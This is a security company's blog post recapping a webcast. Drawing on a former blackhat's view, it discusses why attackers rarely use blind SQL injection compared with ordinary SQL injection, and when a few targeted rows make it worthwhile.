For those of you who managed to make it to the webcast on the 20th with Matt Johansen and I, you heard quite a bit about the perspective of a blackhat when it comes to SQL injection and blind SQL injection. But I thought it would be worthwhile to write it down here as well, for those who missed it or don’t have the time to listen to the whole thing.

Internally at WhiteHat we’ve had the long-standing belief that blind SQL injection is rarely if ever actually used in attacks. We hear a lot about blind SQL injection at conferences, in papers and while talking with researchers, but we just don’t hear about it being used. Sure, there may be one piece of anecdotal evidence somewhere, but as a general class of attack it doesn’t seem to be a favorite of attackers. The reason being? It’s hard to use.

With our theory in hand we asked our former blackhat friend “Adam” to comment on his perspective. While he believed it was indeed a vulnerability and should be fixed, he wasn’t aware of any regular use of it. He felt that it was a useful exploit but took way too long and was too difficult to use compared to just about any other exploit. So while it may be useful for some things, it’s just impractical compared to the vast number of other ways to attack a web application.

Even though SQL injection and Blind SQL injection have nearly the same damage potential, almost no one other than state-sponsored attackers would bother with it outside of a penetration test or vulnerability scan. There are just too many other ways to break into a site to bother in most cases (trust me). Some tools try to make that process easier, but it can still be a huge pain depending on what we’re talking about. Plus it’s many orders of magnitude more requests to dump a database with blind SQL injection. Having to make many requests means more time and more risk of getting caught – you stick out like a sore thumb. Alternatively, SQL injection is still one of the most wildly used vulnerabilities for exactly the same line of thinking – it’s easy to use.

So what is blind SQL injection actually good for? Is there any circumstance where it’s really worthwhile to bother? Yes – let’s say just a few rows needed to be extracted (admin passwords for instance). Gaining access to a handful of rows might only represent a few hundred requests – well below the radar. Something like an admin password could be used in another attack which makes the process of exploitation much easier. So I would never claim that it’s not worth fixing – and neither would Adam. Update: and as @bonsaiviking pointed out command injection is another valid use case if you can achieve it.

Getting our theories affirmed is useful for helping us tune Sentinel to be a smarter scanner and prioritize attacks over time.